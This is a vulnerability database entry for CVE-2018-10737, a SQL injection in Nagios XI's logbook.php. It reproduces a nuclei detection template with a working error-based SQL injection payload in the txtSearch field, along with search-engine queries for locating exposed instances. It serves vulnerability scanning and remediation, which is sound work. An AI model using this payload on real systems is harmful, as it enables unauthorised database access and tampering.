Lucene search
K

NagiosXI <= 5.4.12 logbook.php SQL injection

🗓️ 22 Jun 2026 05:20:07Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 69 Views

NagiosXI <= 5.4.12 logbook.php SQL injection via txtSearch parameter. CVSS score: 7.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2018-10737
2 Nov 202400:00
circl
CNVD
SQL Injection Vulnerability in Nagios XI 5.4.12 and Prior (CNVD-2018-09748)
9 May 201800:00
cnvd
CVE
CVE-2018-10737
16 May 201813:00
cve
Cvelist
CVE-2018-10737
16 May 201813:00
cvelist
NVD
CVE-2018-10737
16 May 201813:29
nvd
OpenVAS
Nagios XI < 5.4.13 Multiple Vulnerabilities - Active Check
27 Apr 201800:00
openvas
Prion
Sql injection
16 May 201813:29
prion
seebug.org
NagiosXI <= 5.4.12 logbook.php SQL injection(CVE-2018-10737)
4 May 201800:00
seebug
UbuntuCve
CVE-2018-10737
16 May 201813:29
ubuntucve
VulnCheck KEV
VulnCheck KEV: CVE-2018-10737
14 Nov 202300:00
vulncheck_kev
Rows per page
id: CVE-2018-10737

info:
  name: NagiosXI <= 5.4.12 logbook.php SQL injection
  author: DhiyaneshDK
  severity: high
  description: |
    A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/logbook.php txtSearch parameter.
  impact: |
    Authenticated administrators can execute arbitrary SQL commands to access, modify, or delete database contents, potentially compromising the entire Nagios XI instance.
  remediation: |
    Upgrade to Nagios XI version 5.4.13 or later.
  reference:
    - https://vulners.com/seebug/SSV:97267
    - https://nvd.nist.gov/vuln/detail/CVE-2018-10737
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2018-10737
    cwe-id: CWE-89
    epss-score: 0.42556
    epss-percentile: 0.98532
    cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: nagios
    product: nagios_xi
    shodan-query: http.title:"nagios xi"
    fofa-query:
      - app="Nagios-XI"
      - title="nagios xi"
      - app="nagios-xi"
    google-query: intitle:"nagios xi"
  tags: cve,cve2018,nagios,sqli,vkev,vuln
variables:
  num: "{{rand_int(2000000000, 2100000000)}}"

http:
  - raw:
      - |
        POST /nagiosql/admin/logbook.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        txtSearch=' and (select 1 from(select count(*),concat((select (select (select md5({{num}}))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#

    matchers:
      - type: word
        part: body
        words:
          - "{{md5(num)}}"
# digest: 4b0a00483046022100dd042b4bba13ebf6c86c3dc5a6b16f3121819ffd783cf356cc315b37ccee7a150221008d11f603596b15c775893e0e2ae0f236c5e100c03eedeaef1994c091e0c1caaa:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 26.5
CVSS 37.2
EPSS0.42556
69